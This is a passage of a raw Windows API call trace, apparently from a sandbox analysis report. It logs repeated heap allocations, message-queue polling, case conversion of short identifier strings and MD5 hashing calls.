[0254.228] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0254.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0254.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0254.228] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0254.228] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.228] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.228] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.229] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.229] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.229] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.229] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.229] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.229] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0254.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0254.230] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.230] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.230] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.230] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.230] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0254.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0254.231] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.231] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.231] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0254.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0254.231] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.231] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.232] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.232] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0254.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0254.232] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.232] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.232] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0254.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0254.233] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.233] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.233] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0254.233] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0254.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0254.233] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.234] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0254.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0254.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0254.234] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.234] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.234] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0254.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0254.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0254.235] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0254.235] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0254.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0254.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0254.235] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0254.235] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.235] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0254.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0254.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0254.236] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0254.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0254.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0254.236] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0254.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0254.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0254.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0254.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.237] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0254.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0254.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0254.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0254.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0254.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0254.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0254.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0254.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0254.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0254.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0254.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0254.239] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.239] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0254.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0254.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0254.240] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.240] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0254.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0254.240] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.240] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.240] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0254.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0254.241] CryptHashData (hHash=0xaa5760, pbData=0x24b1c08, dwDataLen=0x3, dwFlags=0x1) returned 1 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0254.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0254.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0254.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0254.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0254.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0254.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: 